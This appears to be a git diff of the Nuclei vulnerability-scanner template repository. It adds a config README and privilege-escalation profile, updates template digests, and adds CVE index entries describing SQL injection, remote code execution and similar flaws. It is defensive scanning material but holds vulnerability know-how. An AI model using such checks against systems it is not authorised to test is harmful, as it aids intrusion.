max-request: 3
verified: true verified: true
max-request: 3
tags: code,linux,xargs,privesc,local tags: code,linux,xargs,privesc,local
self-contained: true self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")' - 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")' - 'contains(code_3_response, "root")'
condition: or condition: or
# digest: 490a0046304402205fac35cdd5142e3afd382d38b77be0b7105cfc23884e7ac5cbba8aa91cfc2bb002202b6c7ebae29c5c300052a85a39f3e30b71788d590bc40b797c1ee96c1f00f267:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022052f887093022e061b40da1eae5a8b4aa8a5f267dfd5f22db005a9076db73cc9a02210093f126e5d0229cf686f3c547dc3466e89afb2a7bf57bbeb790acf65376fcd047:922c64590222798bb761d5b6d8e72950

View File

@ -7,8 +7,8 @@ info:
reference: reference:
- https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-shadow - https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-shadow
metadata: metadata:
max-request: 2
verified: true verified: true
max-request: 2
tags: code,linux,privesc,local tags: code,linux,privesc,local
self-contained: true self-contained: true
@ -42,4 +42,4 @@ code:
words: words:
- "Not readable and not writable" - "Not readable and not writable"
negative: true negative: true
# digest: 490a004630440220516036fa8622068621421ac043a6fb20b6551a6ca3d7851726474cfff7e4d9f902205a1a9ce09b5827f39e2311e6716793a917e29383f5e4d4a4b9a56925afa68e61:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402206152b0b3fe7a164b5583cb921d799f47fdcf9f30da2c32cbbb7248aa7068a13102200b3f49d97a93659dc9f1b56c518921e7e3597478d55eddb1cfc6a76dd45cb968:922c64590222798bb761d5b6d8e72950

39
config/README.md Normal file
View File

@ -0,0 +1,39 @@
## About
This directory hosts Nuclei configuration profiles specifically designed for various use cases, including Bug Bounty, OSINT, and Compliance. The centerpiece of these configurations is the `recommended.yml` file, which offers a handpicked selection of templates that are both efficient and relevant for the majority of scanning scenarios. This curated approach is intended to provide a more focused scanning experience, reducing the occurrence of irrelevant results that often accompany broader scans.
## Usage
The Nuclei configuration profiles are straightforward to integrate into your existing scanning workflows. Below are guidelines on how to utilize the `recommended.yml` configuration for a streamlined scanning process, as well as instructions for customizing your scans to fit specific needs.
### Using the Recommended Configuration
To execute a scan with the `recommended.yml` configuration, which has been optimized for general use to yield efficient and relevant results, use the following command:
```
nuclei -config ~/nuclei-templates/config/recommended.yml
```
## Customizing Your Scanning Configuration
If you have specific requirements or wish to modify the focus of your scans, you can create a custom configuration file based on the structure of recommended.yml. Adjust the template selections to fit your targeted scanning objectives. Once your configuration is set, run Nuclei using your custom file with the command:
```
nuclei -config your-custom-config.yml
```
## Examples
Here are examples of how to run scans for specific scenarios:
#### Running Local Privilege Escalation Checks
For targeting local privilege escalation vulnerabilities, utilize the dedicated config as follows:
```
nuclei -config ~/nuclei-templates/config/privilege-escalation.yml
```
#### Config Focusing on OSINT
```
nuclei -config ~/nuclei-templates/config/osint.yml
```

View File

@ -0,0 +1,7 @@
code: true
tags:
- privesc
include-tags:
- local

View File

@ -265,6 +265,7 @@
{"ID":"CVE-2015-1427","Info":{"Name":"ElasticSearch - Remote Code Execution","Severity":"high","Description":"ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1427.yaml"} {"ID":"CVE-2015-1427","Info":{"Name":"ElasticSearch - Remote Code Execution","Severity":"high","Description":"ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1427.yaml"}
{"ID":"CVE-2015-1503","Info":{"Name":"IceWarp Mail Server \u003c11.1.1 - Directory Traversal","Severity":"high","Description":"IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1503.yaml"} {"ID":"CVE-2015-1503","Info":{"Name":"IceWarp Mail Server \u003c11.1.1 - Directory Traversal","Severity":"high","Description":"IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1503.yaml"}
{"ID":"CVE-2015-1579","Info":{"Name":"WordPress Slider Revolution - Local File Disclosure","Severity":"medium","Description":"Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-1579.yaml"} {"ID":"CVE-2015-1579","Info":{"Name":"WordPress Slider Revolution - Local File Disclosure","Severity":"medium","Description":"Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-1579.yaml"}
{"ID":"CVE-2015-1635","Info":{"Name":"Microsoft Windows 'HTTP.sys' - Remote Code Execution","Severity":"critical","Description":"HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka \"HTTP.sys Remote Code Execution Vulnerability.\"\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2015/CVE-2015-1635.yaml"}
{"ID":"CVE-2015-1880","Info":{"Name":"Fortinet FortiOS \u003c=5.2.3 - Cross-Site Scripting","Severity":"medium","Description":"Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-1880.yaml"} {"ID":"CVE-2015-1880","Info":{"Name":"Fortinet FortiOS \u003c=5.2.3 - Cross-Site Scripting","Severity":"medium","Description":"Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-1880.yaml"}
{"ID":"CVE-2015-20067","Info":{"Name":"WP Attachment Export \u003c 0.2.4 - Unrestricted File Download","Severity":"high","Description":"The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress\npowered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-20067.yaml"} {"ID":"CVE-2015-20067","Info":{"Name":"WP Attachment Export \u003c 0.2.4 - Unrestricted File Download","Severity":"high","Description":"The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress\npowered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-20067.yaml"}
{"ID":"CVE-2015-2067","Info":{"Name":"Magento Server MAGMI - Directory Traversal","Severity":"medium","Description":"Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2067.yaml"} {"ID":"CVE-2015-2067","Info":{"Name":"Magento Server MAGMI - Directory Traversal","Severity":"medium","Description":"Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2067.yaml"}
@ -1151,6 +1152,7 @@
{"ID":"CVE-2021-24409","Info":{"Name":"Prismatic \u003c 2.8 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24409.yaml"} {"ID":"CVE-2021-24409","Info":{"Name":"Prismatic \u003c 2.8 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24409.yaml"}
{"ID":"CVE-2021-24435","Info":{"Name":"WordPress Titan Framework plugin \u003c= 1.12.1 - Cross-Site Scripting","Severity":"medium","Description":"The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24435.yaml"} {"ID":"CVE-2021-24435","Info":{"Name":"WordPress Titan Framework plugin \u003c= 1.12.1 - Cross-Site Scripting","Severity":"medium","Description":"The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24435.yaml"}
{"ID":"CVE-2021-24436","Info":{"Name":"WordPress W3 Total Cache \u003c2.1.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress W3 Total Cache plugin before 2.1.4 is susceptible to cross-site scripting within the extension parameter in the Extensions dashboard, which is output in an attribute without being escaped first. This can allow an attacker to convince an authenticated admin into clicking a link to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24436.yaml"} {"ID":"CVE-2021-24436","Info":{"Name":"WordPress W3 Total Cache \u003c2.1.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress W3 Total Cache plugin before 2.1.4 is susceptible to cross-site scripting within the extension parameter in the Extensions dashboard, which is output in an attribute without being escaped first. This can allow an attacker to convince an authenticated admin into clicking a link to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24436.yaml"}
{"ID":"CVE-2021-24442","Info":{"Name":"Wordpress Polls Widget \u003c 1.5.3 - SQL Injection","Severity":"critical","Description":"The Poll, Survey, Questionnaire and Voting system WordPress plugin before 1.5.3 did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24442.yaml"}
{"ID":"CVE-2021-24452","Info":{"Name":"WordPress W3 Total Cache \u003c2.1.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress W3 Total Cache plugin before 2.1.5 is susceptible to cross-site scripting via the extension parameter in the Extensions dashboard, when the setting 'Anonymously track usage to improve product quality' is enabled. The parameter is output in a JavaScript context without proper escaping. This can allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24452.yaml"} {"ID":"CVE-2021-24452","Info":{"Name":"WordPress W3 Total Cache \u003c2.1.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress W3 Total Cache plugin before 2.1.5 is susceptible to cross-site scripting via the extension parameter in the Extensions dashboard, when the setting 'Anonymously track usage to improve product quality' is enabled. The parameter is output in a JavaScript context without proper escaping. This can allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24452.yaml"}
{"ID":"CVE-2021-24472","Info":{"Name":"Onair2 \u003c 3.9.9.2 \u0026 KenthaRadio \u003c 2.0.2 - Remote File Inclusion/Server-Side Request Forgery","Severity":"critical","Description":"Onair2 \u003c 3.9.9.2 and KenthaRadio \u003c 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24472.yaml"} {"ID":"CVE-2021-24472","Info":{"Name":"Onair2 \u003c 3.9.9.2 \u0026 KenthaRadio \u003c 2.0.2 - Remote File Inclusion/Server-Side Request Forgery","Severity":"critical","Description":"Onair2 \u003c 3.9.9.2 and KenthaRadio \u003c 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24472.yaml"}
{"ID":"CVE-2021-24488","Info":{"Name":"WordPress Post Grid \u003c2.1.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Post Grid plugin before 2.1.8 contains a reflected cross-site scripting vulnerability. The slider import search feature and tab parameter of thesettings are not properly sanitized before being output back in the pages,","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24488.yaml"} {"ID":"CVE-2021-24488","Info":{"Name":"WordPress Post Grid \u003c2.1.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Post Grid plugin before 2.1.8 contains a reflected cross-site scripting vulnerability. The slider import search feature and tab parameter of thesettings are not properly sanitized before being output back in the pages,","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24488.yaml"}
@ -1169,6 +1171,7 @@
{"ID":"CVE-2021-24791","Info":{"Name":"Header Footer Code Manager \u003c 1.1.14 - Admin+ SQL Injection","Severity":"high","Description":"The Header Footer Code Manager WordPress plugin before 1.1.14 does not validate and escape the \"orderby\" and \"order\" request parameters before using them in a SQL statement when viewing the Snippets admin dashboard, leading to SQL injections\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-24791.yaml"} {"ID":"CVE-2021-24791","Info":{"Name":"Header Footer Code Manager \u003c 1.1.14 - Admin+ SQL Injection","Severity":"high","Description":"The Header Footer Code Manager WordPress plugin before 1.1.14 does not validate and escape the \"orderby\" and \"order\" request parameters before using them in a SQL statement when viewing the Snippets admin dashboard, leading to SQL injections\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-24791.yaml"}
{"ID":"CVE-2021-24827","Info":{"Name":"WordPress Asgaros Forum \u003c1.15.13 - SQL Injection","Severity":"critical","Description":"WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24827.yaml"} {"ID":"CVE-2021-24827","Info":{"Name":"WordPress Asgaros Forum \u003c1.15.13 - SQL Injection","Severity":"critical","Description":"WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24827.yaml"}
{"ID":"CVE-2021-24838","Info":{"Name":"WordPress AnyComment \u003c0.3.5 - Open Redirect","Severity":"medium","Description":"WordPress AnyComment plugin before 0.3.5 contains an open redirect vulnerability via an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24838.yaml"} {"ID":"CVE-2021-24838","Info":{"Name":"WordPress AnyComment \u003c0.3.5 - Open Redirect","Severity":"medium","Description":"WordPress AnyComment plugin before 0.3.5 contains an open redirect vulnerability via an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24838.yaml"}
{"ID":"CVE-2021-24849","Info":{"Name":"WCFM WooCommerce Multivendor Marketplace \u003c 3.4.12 - SQL Injection","Severity":"critical","Description":"The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24849.yaml"}
{"ID":"CVE-2021-24862","Info":{"Name":"WordPress RegistrationMagic \u003c5.0.1.6 - Authenticated SQL Injection","Severity":"high","Description":"WordPress RegistrationMagic plugin before 5.0.1.6 contains an authenticated SQL injection vulnerability. The plugin does not escape user input in its rm_chronos_ajax AJAX action before using it in a SQL statement when duplicating tasks in batches. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. This is a potential issue in both WordPress and WordPress Administrator.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-24862.yaml"} {"ID":"CVE-2021-24862","Info":{"Name":"WordPress RegistrationMagic \u003c5.0.1.6 - Authenticated SQL Injection","Severity":"high","Description":"WordPress RegistrationMagic plugin before 5.0.1.6 contains an authenticated SQL injection vulnerability. The plugin does not escape user input in its rm_chronos_ajax AJAX action before using it in a SQL statement when duplicating tasks in batches. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. This is a potential issue in both WordPress and WordPress Administrator.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-24862.yaml"}
{"ID":"CVE-2021-24875","Info":{"Name":"WordPress eCommerce Product Catalog \u003c3.0.39 - Cross-Site Scripting","Severity":"medium","Description":"WordPress eCommerce Product Catalog plugin before 3.0.39 contains a cross-site scripting vulnerability. The plugin does not escape the ic-settings-search parameter before outputting it back in the page in an attribute. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24875.yaml"} {"ID":"CVE-2021-24875","Info":{"Name":"WordPress eCommerce Product Catalog \u003c3.0.39 - Cross-Site Scripting","Severity":"medium","Description":"WordPress eCommerce Product Catalog plugin before 3.0.39 contains a cross-site scripting vulnerability. The plugin does not escape the ic-settings-search parameter before outputting it back in the page in an attribute. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24875.yaml"}
{"ID":"CVE-2021-24891","Info":{"Name":"WordPress Elementor Website Builder \u003c3.1.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. It does not sanitize or escape user input appended to the DOM via a malicious hash.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24891.yaml"} {"ID":"CVE-2021-24891","Info":{"Name":"WordPress Elementor Website Builder \u003c3.1.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. It does not sanitize or escape user input appended to the DOM via a malicious hash.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24891.yaml"}
@ -1178,6 +1181,7 @@
{"ID":"CVE-2021-24926","Info":{"Name":"WordPress Domain Check \u003c1.0.17 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Domain Check plugin before 1.0.17 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the domain parameter before outputting it back in the page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24926.yaml"} {"ID":"CVE-2021-24926","Info":{"Name":"WordPress Domain Check \u003c1.0.17 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Domain Check plugin before 1.0.17 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the domain parameter before outputting it back in the page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24926.yaml"}
{"ID":"CVE-2021-24931","Info":{"Name":"WordPress Secure Copy Content Protection and Content Locking \u003c2.8.2 - SQL Injection","Severity":"critical","Description":"WordPress Secure Copy Content Protection and Content Locking plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24931.yaml"} {"ID":"CVE-2021-24931","Info":{"Name":"WordPress Secure Copy Content Protection and Content Locking \u003c2.8.2 - SQL Injection","Severity":"critical","Description":"WordPress Secure Copy Content Protection and Content Locking plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24931.yaml"}
{"ID":"CVE-2021-24940","Info":{"Name":"WordPress Persian Woocommerce \u003c=5.8.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Persian Woocommerce plugin through 5.8.0 contains a cross-site scripting vulnerability. The plugin does not escape the s parameter before outputting it back in an attribute in the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and possibly steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24940.yaml"} {"ID":"CVE-2021-24940","Info":{"Name":"WordPress Persian Woocommerce \u003c=5.8.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Persian Woocommerce plugin through 5.8.0 contains a cross-site scripting vulnerability. The plugin does not escape the s parameter before outputting it back in an attribute in the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and possibly steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24940.yaml"}
{"ID":"CVE-2021-24943","Info":{"Name":"Registrations for the Events Calendar \u003c 2.7.6 - SQL Injection","Severity":"critical","Description":"The Registrations for the Events Calendar WordPress plugin before 2.7.6 does not sanitise and escape the event_id in the rtec_send_unregister_link AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24943.yaml"}
{"ID":"CVE-2021-24946","Info":{"Name":"WordPress Modern Events Calendar \u003c6.1.5 - Blind SQL Injection","Severity":"critical","Description":"WordPress Modern Events Calendar plugin before 6.1.5 is susceptible to blind SQL injection. The plugin does not sanitize and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24946.yaml"} {"ID":"CVE-2021-24946","Info":{"Name":"WordPress Modern Events Calendar \u003c6.1.5 - Blind SQL Injection","Severity":"critical","Description":"WordPress Modern Events Calendar plugin before 6.1.5 is susceptible to blind SQL injection. The plugin does not sanitize and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24946.yaml"}
{"ID":"CVE-2021-24947","Info":{"Name":"WordPress Responsive Vector Maps \u003c 6.4.2 - Arbitrary File Read","Severity":"medium","Description":"WordPress Responsive Vector Maps \u003c 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-24947.yaml"} {"ID":"CVE-2021-24947","Info":{"Name":"WordPress Responsive Vector Maps \u003c 6.4.2 - Arbitrary File Read","Severity":"medium","Description":"WordPress Responsive Vector Maps \u003c 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-24947.yaml"}
{"ID":"CVE-2021-24956","Info":{"Name":"Blog2Social \u003c 6.8.7 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social: Social Media Auto Post \u0026 Scheduler WordPress plugin before 6.8.7 does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24956.yaml"} {"ID":"CVE-2021-24956","Info":{"Name":"Blog2Social \u003c 6.8.7 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social: Social Media Auto Post \u0026 Scheduler WordPress plugin before 6.8.7 does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24956.yaml"}
@ -2167,6 +2171,7 @@
{"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"} {"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"}
{"ID":"CVE-2023-37979","Info":{"Name":"Ninja Forms \u003c 3.6.26 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37979.yaml"} {"ID":"CVE-2023-37979","Info":{"Name":"Ninja Forms \u003c 3.6.26 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37979.yaml"}
{"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"} {"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"}
{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"}
{"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"} {"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"}
